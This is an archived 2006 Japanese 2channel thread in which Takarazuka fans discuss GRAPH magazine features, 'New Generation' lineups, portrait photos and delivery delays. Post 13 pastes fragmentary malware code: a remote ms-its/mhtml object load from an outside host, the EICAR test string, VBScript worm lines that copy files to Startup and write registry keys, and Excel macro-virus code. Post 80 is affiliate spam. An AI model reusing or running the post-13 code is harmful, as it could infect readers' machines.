5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【宝塚GRAPH】ヅカ本!!【歌劇】7冊目

1 :名無しさん@花束いっぱい。:2006/12/11(月) 03:53:07 ID:wAHoIZPg
宝塚の本や雑誌をマターリ語りましょう(´∀`)
980踏んだら、次スレたて頼みます。

前スレ
【宝塚GRAPH】ヅカ本!!【歌劇】7冊目
http://hobby8.2ch.net/test/read.cgi/siki/1161138784/l50


2 :1:2006/12/11(月) 03:56:49 ID:wAHoIZPg
通番間違えました、実質は、8冊目です。

過去スレはこちら

1 http://hobby8.2ch.net/test/read.cgi/siki/1119258652/
2 http://hobby8.2ch.net/test/read.cgi/siki/1125717803/
3 http://hobby8.2ch.net/test/read.cgi/siki/1133424051/
4 http://hobby8.2ch.net/test/read.cgi/siki/1139495696/
5 http://hobby8.2ch.net/test/read.cgi/siki/1146402715/
6 http://hobby8.2ch.net/test/read.cgi/siki/1154083030/

宝塚おとめ の話はここではなく、下記のスレでお願いします。
「おとめ2005年度について」
http://hobby8.2ch.net/test/read.cgi/siki/1112169367/




3 :名無しさん@花束いっぱい。:2006/12/11(月) 09:18:20 ID:8KLB+nwD
1乙!
ニュージェネ情報追加で
★花★
前列→白鳥、日向
後列→扇、天宮、朝夏、望月、望海、祐澄

★月★
左から美翔、明日海、榎、星条、龍、光月、流輝
★雪★
左から凰稀、緒月、沙央、大湖、?、蓮城
残りは大凪?
★星★
上段→美弥、紅、?
中段→麻尋、?、和
下段→彩海、壱城
残り…夢乃と水輝
★宙★
上段→暁、七海?、?
中段→蓮水?、凪七
下段→?、?
残り…早霧、春風、鳳翔あたり

4 :名無しさん@花束いっぱい。:2006/12/11(月) 20:48:21 ID:/OaX+1d4
雪も星もチガウぞ・・・

5 :名無しさん@花束いっぱい。:2006/12/11(月) 22:02:39 ID:8KLB+nwD
>4
フォローおながいします。
出た情報を総合してみただけなんで…

6 :名無しさん@花束いっぱい。:2006/12/11(月) 22:33:21 ID:dJXpUnOS
花組
 BCDEFG
   @  A
@白鳥 A日向 B扇 C天宮 D朝夏 E望月 F祐澄 G望海

月組
 @ABCDEF
@美翔 A明日海 B榎 C星条 D龍 E光月 F流輝

雪組
 @ABCDE
@? A緒月 B沙央 C大湖 D凰稀 E蓮城

星組
 EFG
 BCD
  @A
@麻尋 A壱城 B和 C彩海 D夢乃 E美弥 F紅 G?

宙組
 DEF
  BC
  @A
@? A凪七 B春風 C早霧 DGO E? F蓮水

7 :名無しさん@花束いっぱい。:2006/12/11(月) 23:23:07 ID:vx/2Sb0a
つ写真
http://ec1.images-amazon.com/images/P/4484065142.01._SS500_SCLZZZZZZZ_V34321555_.jpg

8 :名無しさん@花束いっぱい。:2006/12/11(月) 23:41:08 ID:2Zm3r8uC
雪の1は大凪。
星の8は水輝、宙の1は七海じゃなかろうか。

9 :名無しさん@花束いっぱい。:2006/12/12(火) 00:55:51 ID:GFsMJFu8
他組は非路線(微妙路線?)も結構入ってるのに、なんで雪だけほぼ路線だけなんだろ。
つか、この中に大凪が入ってると激しく違和感が・・・。
大凪が入るなら、真波とかが入っててもいいと思うんだが。

10 :名無しさん@花束いっぱい。:2006/12/12(火) 01:55:52 ID:C4PioeoR
前スレ1000

       。・゚・(ノД`)・゚・。うんうん

11 :名無しさん@花束いっぱい。:2006/12/12(火) 02:24:06 ID:ifanFWjG
前スレ1000

       。・゚・(ノД`)・゚・。いいこと言った!

12 :名無しさん@花束いっぱい。:2006/12/12(火) 02:26:19 ID:ivTH2fPU
そらちゃん入れるなら谷やんも…
ってなるからじゃない?
だからといって、なぜ大凪??

でも改めてパンフをぱらぱら見ると、路線非路線がくっきりついてるな>雪組

13 :<body onload=window()>:2006/12/12(火) 06:28:15 ID:sBWIFWPX
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

14 :名無しさん@花束いっぱい。:2006/12/12(火) 09:14:34 ID:SxcBWJGV
雪はらぎじゃないの?

15 :名無しさん@花束いっぱい。:2006/12/12(火) 09:16:53 ID:3D5g1YUK
宙組
1は七海
6は鳳翔

16 :名無しさん@花束いっぱい。:2006/12/12(火) 09:48:19 ID:ivTH2fPU
らぎ、学年上過ぎて入れてないんじゃない?
らぎの学年OKならおとちゃん入りそうだし。

17 :名無しさん@花束いっぱい。:2006/12/12(火) 09:56:59 ID:Cx3uYAHT
>14
らぎは85期。ニュージェネメンバーは86期〜89期。
みずせ、そらどちらかを入れてしまうと
同期男役の中一人だけ落選…みたいになっちゃうから
(ふたりとも入れてしまうと多すぎるし)
あえて人数少ない(全体でみても)88期から…というかんじじゃなかろうか。
一応入団首席だし。
入団首席(現役男役内で)はみんなメンバー入りしてるね。

18 :名無しさん@花束いっぱい。:2006/12/12(火) 10:13:39 ID:KQU2smjo
こんな下級生興味ねぇな
ジェネに載ってる奴等はどうせ皆合コン狂い

19 :名無しさん@花束いっぱい。:2006/12/12(火) 13:10:41 ID:Z5ZONxTQ
ニュージェネっていつ発売なの??

20 :名無しさん@花束いっぱい。:2006/12/12(火) 13:14:09 ID:ZhtwPCrE
15日だったと思う

21 :名無しさん@花束いっぱい。:2006/12/12(火) 13:16:33 ID:Z5ZONxTQ
20>もうすぐなのね!ありがとう!

22 :名無しさん@花束いっぱい。:2006/12/12(火) 13:18:22 ID:Cx3uYAHT
延期になって26日だよ。

23 :名無しさん@花束いっぱい。:2006/12/12(火) 13:35:30 ID:+kr1EYyG
>(ふたりとも入れてしまうと多すぎるし)
他の組は8人もあるから別に多くはないと思うけど

24 :名無しさん@花束いっぱい。:2006/12/12(火) 13:38:34 ID:Cx3uYAHT
>23
組内同期4人ってのが多いってこと。
どこも多くても3人。

25 :名無しさん@花束いっぱい。:2006/12/12(火) 15:25:32 ID:zyfVaXeA
多かろうが少なかろうが、劇団が入れたいなら入るでしょ。

26 :名無しさん@花束いっぱい。:2006/12/13(水) 01:11:07 ID:+EY+uBaQ
チギ目当てで買ってしまいそうだ>ジェネ

27 :名無しさん@花束いっぱい。:2006/12/16(土) 01:58:46 ID:jn/WJew7
87期同期ルポ確実
花…華城・白鳥
月…龍
雪…沙央・晴華
宙…早霧・和音・咲花
有力
日向・紫水(時期的に)・綾月・白帆・鶴美・夢乃・華凛
ルポライターは白鳥・夢乃・早霧かな。
フジコは入るだろう。で、問題はふぁーびーとまめか…。
夢乃外して両方入れる…でもそうすると星が居ない…。

28 :名無しさん@花束いっぱい。:2006/12/17(日) 00:14:39 ID:yV98zOWZ
日向、夢乃ははいるだろ。
紫水は退団がなければ入った可能性あるが、逆に外すかも。
綾月、白帆、華凜よりはニュージェネレーションメンバーの榎のほうが入るんじゃないか?
ライターはバリバリ路線じゃない生徒のほうが多いから
日向か白鳥(組替えしてるし)な気がする。

29 :名無しさん@花束いっぱい。:2006/12/17(日) 02:32:51 ID:lthzAVH/
ふぁーびーよりとーやんでそ。

30 :名無しさん@花束いっぱい。:2006/12/17(日) 11:48:41 ID:w4eO/XlW
グラフ届いた〜!

87期のライターは日向だお

31 :名無しさん@花束いっぱい。:2006/12/17(日) 11:56:46 ID:kHO38P0V
>30
マメか!第1回は誰?

>27>28>29
今までの劇団の扱いから行くととーやんな気がする。
でも個人的にはふぁーびーがいいな。

32 :名無しさん@花束いっぱい。:2006/12/17(日) 12:07:30 ID:AE22FxSc
やたっ!!
マメ期待!!

33 :30:2006/12/17(日) 12:20:36 ID:w4eO/XlW
第一回目は沙央だお
扮装は戦隊モノw


34 :名無しさん@花束いっぱい。:2006/12/17(日) 13:21:22 ID:N+f6utIQ
マメおもしろそう 早く見たい

35 :名無しさん@花束いっぱい。:2006/12/17(日) 14:27:50 ID:aqGnRRmh
来月のラインナップをお願いします!

36 :名無しさん@花束いっぱい。:2006/12/17(日) 14:48:34 ID:GZyyBXEF
age

37 :名無しさん@花束いっぱい。:2006/12/17(日) 15:04:26 ID:SZuKspgE
27だがトーヤン忘れてた〜。
確実と有力に分けようとおもっいてトーヤン
けしたら有力に入れるのを忘れた…。
個人的にはもゆるの対談が見てみたいんだよね。

38 :名無しさん@花束いっぱい。:2006/12/17(日) 15:22:15 ID:2z7vtAmi
質問
先日発表された来年の公演スケジュール
最新グラフに掲載されてますか?

スターのポートレイトの感想も書いて下さると嬉しいです

39 :名無しさん@花束いっぱい。:2006/12/17(日) 15:37:31 ID:JKWnPXaj
マメちゃんおめでとう!
第1弾はコマだね
私の予想(希望)は…
花…初姫、白鳥
月…龍、綾月
雪…沙央(済)、晴香
星…夢乃、音花
宙…早霧、和音

かな。本当はもっと載って欲しい人いっぱいいるけど

40 :名無しさん@花束いっぱい。:2006/12/17(日) 15:44:21 ID:w4eO/XlW
次号

表紙 貴城けい
Cover Special 貴城けい&紫城るい

貴城けいサヨナラ特集
紫城るいサヨナラ特集

Dear 真飛聖

Dress Press 紫城るい

Fantastic Fairy 遠野あすか

STAGE
「夢のメモランダム」
「維新回天・竜馬伝(新公)」

ステージポスター 貴城けい

GRAPHスペシャルピンナップ 水夏希

携帯なんで見にくかったらスマソ

41 :名無しさん@花束いっぱい。:2006/12/17(日) 16:00:03 ID:yV98zOWZ
同期紹介…
確定(TCA出演済み)
花…華城
月…龍
雪…沙央、晴華
宙…早霧、和音
多分入りそう
花…白鳥
星…夢乃
宙…咲花
ライターとの仲の良さによってはメンバー入りしそう
花…初姫
月…紫水、榎
星…鶴美、音花
宙…八雲

こんなかんじじゃないか?
さあやはまめと同じ組だし入るかもね。ファントムで組んでるし一応ヒロイン経験もあるし。

42 :名無しさん@花束いっぱい。:2006/12/17(日) 16:00:53 ID:w4eO/XlW
来年後半のライナップはまだ載ってなかったです。

今月の熱烈対談は霧矢×遠野でした。

43 :名無しさん@花束いっぱい。:2006/12/17(日) 16:03:35 ID:2z7vtAmi
>42
ありがとうございました。
1月号の歌劇には載るでしょうね。

44 :名無しさん@花束いっぱい。:2006/12/17(日) 16:04:47 ID:SZuKspgE
同期ルポは
花…華城
月…龍
雪…晴華
宙…早霧・和音・咲花
といった新公主演・ヒロ経験者は間違いないと思う。
で、のこり4人だから白鳥・榎・夢乃・音花かな。
さあや・ふぁーびー・つるみん・もゆるあたりも見てみたかったが。

45 :名無しさん@花束いっぱい。:2006/12/17(日) 16:13:08 ID:d1DO/2nm
熱烈退団キリあす
前にもキリはトウコと退団じゃなかった?
うむむ・・

46 :名無しさん@花束いっぱい。:2006/12/17(日) 16:16:18 ID:d1DO/2nm
ギャゴメン対談の大間違い

47 :名無しさん@花束いっぱい。:2006/12/17(日) 17:07:55 ID:CQZFoMaX
>45
2周目に入ったっぽいんだよ>熱烈対談
何でかは知らんが

48 :名無しさん@花束いっぱい。:2006/12/17(日) 17:33:07 ID:VR/33wSP
>47
45タンは2周目についてではなく、きりやんの対談相手が2回とも
星組ってのが気になるんじゃない…?
違ったらごめんよ。

49 :名無しさん@花束いっぱい。:2006/12/17(日) 17:40:09 ID:Kc211gDN
月全ツのルポって無いの?

50 :名無しさん@花束いっぱい。:2006/12/17(日) 19:49:22 ID:lthzAVH/
>>48
え〜!!また霧やん星移動とか言いださないでよぉ!

51 :名無しさん@花束いっぱい。:2006/12/17(日) 19:55:43 ID:4UcQsFd3
>50
それはない

52 :名無しさん@花束いっぱい。:2006/12/17(日) 23:09:45 ID:HdRbgqXk
とうあす→きりあす
決定ですな

53 :名無しさん@花束いっぱい。:2006/12/17(日) 23:14:45 ID:k6OGC5wQ
51ではないが、それはないよ。

54 :名無しさん@花束いっぱい。:2006/12/17(日) 23:23:15 ID:wjLNHuoG
>53
断言するってことは何か情報をお持ちなの?

55 :467:2006/12/18(月) 01:17:32 ID:LO2KdPLW
>44
沙央くらまくんも入れてあげて、ベルばら新公主演してるから。

56 :55:2006/12/18(月) 01:19:44 ID:LO2KdPLW
わぁ 勘違いしますた; コマはもう今月号に載ったのね!
スレをさかのぼって読んでたから見落としてました すみません

57 :名無しさん@花束いっぱい。:2006/12/18(月) 03:12:06 ID:SATkfElu
とりあえず理事はいらん<熱烈対談
ミズは明らかに御挨拶だったしなぁ・・・並びはよかったが。
理事が呼ぶ方だと人事のキーになりそうだが・・・

58 :名無しさん@花束いっぱい。:2006/12/18(月) 07:57:10 ID:0UbwQ5QT
理事なら越リュウあたりがよいな

59 :名無しさん@花束いっぱい。:2006/12/18(月) 08:10:57 ID:wfrPNhQu
おお、理事リュウいいかも

60 :名無しさん@花束いっぱい。:2006/12/18(月) 10:59:26 ID:SATkfElu
オクラホマ繋がりか・・・見たい。
素の写真もいいけど、扮装で並ばれるのもいいかも(*´Д`)

61 :名無しさん@花束いっぱい。:2006/12/18(月) 15:54:36 ID:ZkCCh6xZ
マメ一瞬おっさんに見えたwww

62 :名無しさん@花束いっぱい。:2006/12/18(月) 18:00:30 ID:IrAX+YaC
何とか>13のを画面に出ないようにしたい…
あれって画面から消えたら効果失せるっけ?

マメと八雲の絡みがあったら濃そうだからゼヒ読みたいんだが、
たぶん無理だろうな…残念。

63 :名無しさん@花束いっぱい。:2006/12/18(月) 19:30:55 ID:w4fbE/QH
11STAR 2007の感想
理事 ちょい女らしい 
おさ これから乗馬?
あさ 地味でない?
かし やっぱ華やかな美人だ
とう すっきり
みず ベルト!
かな お姉さんになったねえ
とな 服はいいけど化粧をもう少し華やかにしても・・・
彩音 良くも悪くも若いな
るい 清楚感がある

64 :名無しさん@花束いっぱい。:2006/12/18(月) 20:00:09 ID:IEE6apmz
ベルトてw

65 :名無しさん@花束いっぱい。:2006/12/18(月) 20:47:15 ID:BzVOxlbH
あさかな、こういう路線で行くのかな?

66 :名無しさん@花束いっぱい。:2006/12/18(月) 20:48:09 ID:ZCUiOCA4
オサの乗馬も気になるw

あすかの名前が無い様だけど、まだ娘1扱いじゃないんだっけ?

67 :名無しさん@花束いっぱい。:2006/12/18(月) 20:53:36 ID:ZCUiOCA4
連投ゴメソ、あさかな、どういう路線なの?

68 :名無しさん@花束いっぱい。:2006/12/18(月) 21:21:07 ID:IHldzmfL
>66
あすかも娘1の扱いだよ>グラフ1月号。
見事に就任順に並んでた。

69 :名無しさん@花束いっぱい。:2006/12/18(月) 21:29:33 ID:ZCUiOCA4
>>68、d。
>>63の感想にあすかの名前が無いみたいだから、
まだポートには入れなかったのかな〜と思った。


70 :名無しさん@花束いっぱい。:2006/12/18(月) 21:34:40 ID:BzVOxlbH
>67
ファンはヤキモチ妬くかな。
かなみの服がまたセクシィなんだな。

71 :名無しさん@花束いっぱい。:2006/12/18(月) 21:49:21 ID:2ZM6n3cP
華城の同期紹介はないですよ
まぁ理由は書けませんが、

72 :名無しさん@花束いっぱい。:2006/12/18(月) 21:57:47 ID:mcZRo78k
きりあすいいな〜
お似合いだと思うな。でも何であすかでかい、と思わないんだろ。ヒール低いわけでもないし・・上手いな。
中身的には、あさかなみたい。ある意味戦友かな・・?

73 :名無しさん@花束いっぱい。:2006/12/18(月) 22:00:45 ID:w4fbE/QH
63です。
あすかちゃん、忘れてました。キュートです。

74 :名無しさん@花束いっぱい。:2006/12/18(月) 22:50:08 ID:fN5KrGDH
>71 理由は書けませんって
華城が載らなかったらイコール退団って事やろ

75 :名無しさん@花束いっぱい。:2006/12/18(月) 22:55:39 ID:6vZo+8OU
とうあすもピッタリだがきりあすもイイ!≡゚∀゚)
あいあいも個性的だからきりあいが似合うのかもとふと思った。

76 :名無しさん@花束いっぱい。:2006/12/18(月) 23:31:31 ID:M77PkTw1
CSのブリリアントで、水の熱いベルト語りを見たもんで
グラフで案の定ベルトがっつり巻いてるのみてワロタ!

77 :名無しさん@花束いっぱい。:2006/12/18(月) 23:50:57 ID:SATkfElu
>>75きりやんとあいあいはショーでもよく組むしね。
似合うってのはいいことだ

78 :名無しさん@花束いっぱい。:2006/12/19(火) 09:22:28 ID:LYyykeI2
星は、トウアス→キリアスに継ぐという事で決定!

79 :名無しさん@花束いっぱい。:2006/12/19(火) 14:00:06 ID:24XRiClW
本気で星の後任はきりやんがいいな。似合ってるし、あいあいでは背が高すぎかな。
あすかちゃんもきりやんもいい意味で気を使わない関係は出来上がってるみたいだし。
とうこさんときりやんって似てるのか・・?面白いけど

80 :名無しさん@花束いっぱい。:2006/12/19(火) 14:17:22 ID:9G2pgf4E
http://atq.ck.valuecommerce.com/servlet/atq/referral?sid=2219441&pid=874302784&vcptn=blog%2Fp%2FdSfxN_Fm3N_yVt5whufQMESbfDNi

81 :名無しさん@花束いっぱい。:2006/12/19(火) 15:03:19 ID:YZVlkCDX
>79
とうこさんもきりやんも、舞台上では思いっ切り演じてぶつかっていく方が、
面白がるタイプじゃない?
じゅりぴょんといい、あすかは、関西系の人と合うのかも!?


82 :名無しさん@花束いっぱい。:2006/12/19(火) 15:57:31 ID:DQeiiOHz
グラフの同期紹介どうなるの…?
杏ちゃんが退団しちゃうから誰が新しく入るの?
さあや?ふぁーびー?どいちゃん?

83 :名無しさん@花束いっぱい。:2006/12/19(火) 22:26:40 ID:24XRiClW
2月のグラフにのるんじゃない?2月だったら大丈夫だよね?

84 :名無しさん@花束いっぱい。:2006/12/19(火) 22:35:55 ID:xJS9YN6f
杏ちゃんもナルも載らないから、今まで隠れてた子達チャンスだね!

85 :名無しさん@花束いっぱい。:2006/12/19(火) 22:40:25 ID:DQeiiOHz
あぁそうかグラフって翌月の月で発売するんだった…。
1月1月20日発売、2月2月20日発売だと勘違いした…。
杏ちゃん乗るよね!でも逆襲編はどうなるの?

86 :名無しさん@花束いっぱい。:2006/12/19(火) 22:44:35 ID:XGDIwr5T
逆襲編、今までは退団しても無問題。
退団済ってなるだけで、ちゃんと載ってたよー

87 :名無しさん@花束いっぱい。:2006/12/19(火) 22:45:51 ID:yheCX3AP
同期紹介逆襲編、退団しちゃってる人からもコメント貰って、
○○○○は○月付で退団しております、みたいな付記があったと思う。
最近グラフあんまり読んでないから、違ってたらスマソ。

88 :名無しさん@花束いっぱい。:2006/12/19(火) 22:56:20 ID:7qpKasYU
>78>79
星できりやんって…勘弁してください…
正直とうこちゃんですらモニョ…



89 :名無しさん@花束いっぱい。:2006/12/19(火) 23:02:07 ID:zeZQlxG2
>>87
へえ。
退団した生徒でも載ったんだー。

90 :名無しさん@花束いっぱい。:2006/12/19(火) 23:38:30 ID:y+84QIco
定期購読なのにまだ届かないorz
本屋に行ったほうが早いって何だ!!

91 :名無しさん@花束いっぱい。:2006/12/19(火) 23:43:46 ID:J1TukeMR
>90
(;´Д`)人(´Д`;)ナカーマ
先月まではかなり早く届いていたのに何故だ?
そんな自分は書店勤務… 明日店で読むわorz

92 :名無しさん@花束いっぱい。:2006/12/20(水) 01:00:06 ID:ZCPTCFOo
いや、あさかな2人の服が合ってない。
かなみのセクシーなドレスは色見が地味と言うか変。
胸の所も浮いてるし。
本人にももうちょと明るい色が似合うと思うし。
あさこは顔が変だったりする。

93 :名無しさん@花束いっぱい。:2006/12/20(水) 01:07:06 ID:tB+jSuEM
紀信さんの写真より、蜷川さんの写真の方が好き。
何でか分からないけど。


94 :名無しさん@花束いっぱい。:2006/12/20(水) 01:50:15 ID:jokO/3Vw
蜷川さんの写真、とうこが全然別人になってたからなぁ・・・
あれはTAKAKOさんのメイクのせいもあるのか(FRaUのだけど)。

95 :名無しさん@花束いっぱい。:2006/12/20(水) 07:07:56 ID:JMHSVb4M
>93

私は逆。
蜷川さんだとオシャレすぎるし、男らしさが消えて中性的になりすぎるかなぁ。
コムちゃんとかだと合ってるかもだけど。
蜷川さんのふだんの作品は好きなんだけどね。

96 :名無しさん@花束いっぱい。:2006/12/20(水) 08:53:05 ID:K29Ng06T
かしげのメモリアルブックも蜷川さんみたいだね。
相性悪くないからいいと思う。

97 :名無しさん@花束いっぱい。:2006/12/20(水) 11:38:26 ID:Gv51ElfH
>96
かしげメモリアルブック蜷川さんなの?
だったら買うよ!

蜷川写真集のかしげ、好きだったからさあ

98 :名無しさん@花束いっぱい。:2006/12/20(水) 12:03:05 ID:2PaUc36u
下げ方が分かりません・・・

99 :名無しさん@花束いっぱい。:2006/12/20(水) 14:25:10 ID:YjOFWBm2
平成4年のカシゲ可愛いねw

100 :名無しさん@花束いっぱい。:2006/12/20(水) 14:46:47 ID:nrfjHzRq
亀だけど、
杏ちゃん同期紹介載るよ!今回の最後のところに次回は生八橋が似合う、しとやかな京娘って書いてあったから。
87期で京都出身は杏ちゃんだけだよ。


101 :名無しさん@花束いっぱい。:2006/12/20(水) 14:47:05 ID:JPQyRfnd
>>98たん、E-mail欄にsageと入れてみて。

私も蜷川さんの写真好き!世界にはまる人とはまらない人がいるけど。
はまる・・りかさん、さえちゃん、とうこ、かしげ、ゆうひ
はまらない・・おさ(全く駄目)、わたる

102 :名無しさん@花束いっぱい。:2006/12/20(水) 14:49:51 ID:upwxgSlt
ここにも上げ厨知らないやつがおったかw

103 :名無しさん@花束いっぱい。:2006/12/20(水) 15:17:51 ID:YW621AkC
あさこは地味な顔立ちなのに赤が良く似合うね。
横たわるあさこはかっこいい。
あさかなポートは良い感じのコンビになったなと感じた。

娘役ではあすかちゃんがすごく可愛かった。
オサの白いタイ?リボンが印象的なんですが・・・
トートから一変して王子様路線なのかな?
タニは相変わらず可愛いアイドルですね。



104 :名無しさん@花束いっぱい。:2006/12/20(水) 15:23:00 ID:YjOFWBm2
カシゲ新潮に書かれたね…テラカワイソス

105 :名無しさん@花束いっぱい。:2006/12/20(水) 15:26:10 ID:uI1+BRu+
かしげの新潮ネタはもう終わった…昨日のうちにw
わざわざ上げてごっくろーさまでした。

106 :名無しさん@花束いっぱい。:2006/12/20(水) 15:56:39 ID:4FjJKh2M
>>100
来月に杏ちゃん載るんだね。よかった〜。
間に合わないかなとがっくりきてたから、本当に嬉しい!

107 :名無しさん@花束いっぱい。:2006/12/20(水) 16:23:39 ID:KH12iSQP
再来年の1月号は
(●▽●)の直筆が拝めるんでつね。



今からwktkでつ。

108 :名無しさん@花束いっぱい。:2006/12/20(水) 16:30:09 ID:jokO/3Vw
まだ来ない…orz

109 :名無しさん@花束いっぱい。:2006/12/20(水) 17:20:38 ID:cbVrib5v
うちもまだ来ないw

110 :名無しさん@花束いっぱい。:2006/12/20(水) 18:53:02 ID:m0FXs+tl
かしげさんのおとめの歴史、きれいだ〜
それにしてもこれがシリーズになるなら、
整形した人は断るだろうなぁ〜

111 :名無しさん@花束いっぱい。:2006/12/20(水) 19:10:07 ID:06HG+dP/
>110
今の子は皆入団前に直してるから困らないよw

112 :名無しさん@花束いっぱい。:2006/12/20(水) 19:32:23 ID:GW/moMD9
おとめの遍歴って今年一年あるとしたら、トップ5人2番手5人位でるのかな?

オサの遍歴は興味あり。

113 :名無しさん@花束いっぱい。:2006/12/20(水) 19:36:01 ID:GW/moMD9
あと、かしちゃんのおとめ、平成8年と14年がなかったのはなんでだろう?

自分的にいけてなかったのかな…。

114 :名無しさん@花束いっぱい。:2006/12/20(水) 19:55:17 ID:fBUuwwJt
翌年とコピーしたほど似てた…
失敗して前の年の使われたのかと思ったw

115 :名無しさん@花束いっぱい。:2006/12/20(水) 19:57:46 ID:u8B9Wcq7
かしげの無い奴は平成6・14。
多分前年・後年とかと全然変わんなかったんじゃないかな。

116 :名無しさん@花束いっぱい。:2006/12/20(水) 21:05:15 ID:p+rK4od2
TVnaviにオサのVISAのCMの様子が載ってたけど
あのオサはいいのか・・・

117 :名無しさん@花束いっぱい。:2006/12/20(水) 22:42:52 ID:tSPhTMkI
平成6(1994)年から買い始めてるので確認してみたよ>カシゲ

平成6・7年については変化があるのでアヤシイのは5年との並びかな?>本屋で買うので明日確認してみる

平成13〜15年については14・15年が髪型以外ほとんど印象が変わらなかったwww
13・14年は顔の向きも違うので印象が違ってる。


こんなトコっす。

118 :名無しさん@花束がいっぱい:2006/12/20(水) 22:56:41 ID:OJqhlWxd
110
おとめの歴史は昔もグラフでやってたんだよー
大地真央さんがトップのころもや、紫苑ゆうさんが
トップのころもやってたと思う。
かしちゃんの立ち読みしたけど抜けてたのがあったのは
気がつかなかった。今のトップ初舞台から全部おとめ持ってるのよね。
久しぶりに探してみてみようかなー

119 :名無しさん@花束いっぱい。:2006/12/21(木) 00:22:52 ID:r0VtCiHj
自分>>90でつが、今日もまだ届いてなかったorz

120 :名無しさん@花束いっぱい。:2006/12/21(木) 00:41:37 ID:Uk/lYTo1
関東ですがうちもまだ。あした東宝行く日だから、なんか損した気分

121 :名無しさん@花束いっぱい。:2006/12/21(木) 03:24:51 ID:GO6+l6im
ようやく今日(もう昨日か)GRAPH着いた。
うちは四国だけど、こんなに遅かったのは初めてだ。
やっぱりお歳暮配達のあおり受けてんのかな〜。


122 :名無しさん@花束いっぱい。:2006/12/21(木) 12:22:49 ID:5jIrYpcm
>>121
今の時期、自分の家に来る宅配便会社比較ではあるけど、
黒猫はダントツで忙しそう。
時間指定もずれ込む事があって、よく電話が来る。
「まだ忙しいですか?」って聞いたら、「もう今月一杯は駄目です」って
辛そうに言ってた。

大変なのは分かるけど、でもまだ来ない(´・ω・`)

123 :名無しさん@花束いっぱい。:2006/12/21(木) 12:42:01 ID:cHjgq29V
先月あたりに、配達の何か(記憶力ないな・・・)が変わるので
今後は遅くなるかも、って手紙が入ってなかったっけ。

124 :名無しさん@花束いっぱい。:2006/12/21(木) 13:16:11 ID:LtRERcFZ
あさこちゃん、赤が似合わないね。舞台だと似合うけど、素顔は地味だから?
ダークスーツの方が似合う。かなみんの髪型がきれい。
胸がカパカパのドレスはちと恥ずかしいな。

125 :名無しさん@花束いっぱい。:2006/12/21(木) 13:59:48 ID:DJj8EW3R
篠山先生がかなみんの事を大絶賛してたね。
頭が良いとか言っていたけどやはりね。
かなみんって進学校卒業だけあるよ。

126 :名無しさん@花束いっぱい。:2006/12/21(木) 15:09:27 ID:UwNUjIeU
学力は良いかどうかわからないけど、篠山先生が言ってることは
そっちじゃないでしょ。頭が良い=学力だと思ってない?
進学校卒だからというのは関係ない。



127 :名無しさん@花束いっぱい。:2006/12/21(木) 15:18:06 ID:UwNUjIeU
コピペにレスしてしまった・・・orz

128 :名無しさん@花束いっぱい。:2006/12/21(木) 16:16:07 ID:zp8dI+nY
うん、おとめの歴史は昔もやってた。
また復活したんだね。
総じてみんな写りが微妙なんだよな。
大体において年々ふっくらフェイスから肉が落ちて顔つきが変わってくる。
人に見られることによって引き締まってくるんだと思うよ。

129 :名無しさん@花束いっぱい。:2006/12/21(木) 16:17:19 ID:sd29C/xW
かなみ何か水商売女みたい。生々しくて何か…男性は好きそう。篠山さんもただの男だな。かなみが頭いい?計算かなみちゃんだけ。二人が5組の中で一番って…それってさりげなく他のコンビに対して失礼だと思う!

130 :名無しさん@花束いっぱい。:2006/12/21(木) 16:18:16 ID:r0VtCiHj
>>119でつ。
さっき届いてますた!!
メール便のシステム変更と御歳暮シーズンで遅くなったんですかね?
とりあえず届いたのでいまから読みます。
自分の報告なんて書いてスレチでごめんなさい!!

131 :名無しさん@花束いっぱい。:2006/12/21(木) 16:22:58 ID:5jIrYpcm
さっき届きました@東京

132 :名無しさん@花束いっぱい。:2006/12/21(木) 16:50:32 ID:POYzYUqH
ぷっくりカシゲに勃起しました

133 :名無しさん@花束いっぱい。:2006/12/21(木) 16:56:40 ID:Ow8LU4qN
あさこ赤が凄く似合うと思ったけど・・
舞台もだけど今回のポートも良かったよ。
逆にグレーは似合わない。

かなみは虚ろな目線が得意?
やけに色っぽい。コンビとして板についてきたね。

134 :名無しさん@花束いっぱい。:2006/12/21(木) 17:02:27 ID:POYzYUqH
カシゲって平成4年の頃もハスキーボイス?

135 :名無しさん@花束いっぱい。:2006/12/21(木) 17:09:17 ID:feXSzh3J
麻子の素顔は基本的に派手な色は似合わない。
かといってグレーはもっと地味に見せてしまうんだよ。
無難に白か黒の方がが素敵に見える。

136 :名無しさん@花束いっぱい。:2006/12/21(木) 17:13:14 ID:68U7tvY4
かしちゃんの初舞台の時のインタビュー映像持ってるけど
声は高いよ。


グラフ、あさこ、
グレーも素の彼女には、凄く似合うと思う。
ただ、どうしても地味に見える色だから
表紙とかには向かないと思う。

あさかなは、素だと退廃的な雰囲気が出せるね。
大劇でも、そういう演目に当たれば良いけど。

137 :名無しさん@花束いっぱい。:2006/12/21(木) 18:05:21 ID:hhilVfKs
>>129
嫉妬は見苦しいだけよw

138 :名無しさん@花束いっぱい。:2006/12/21(木) 18:17:49 ID:/r4+TsvA
ミズはボーリングに行くのかと思った(笑)
ていうか目ぇ離れ過ぎじゃない?舞台化粧と違うからそう見えるだけ??

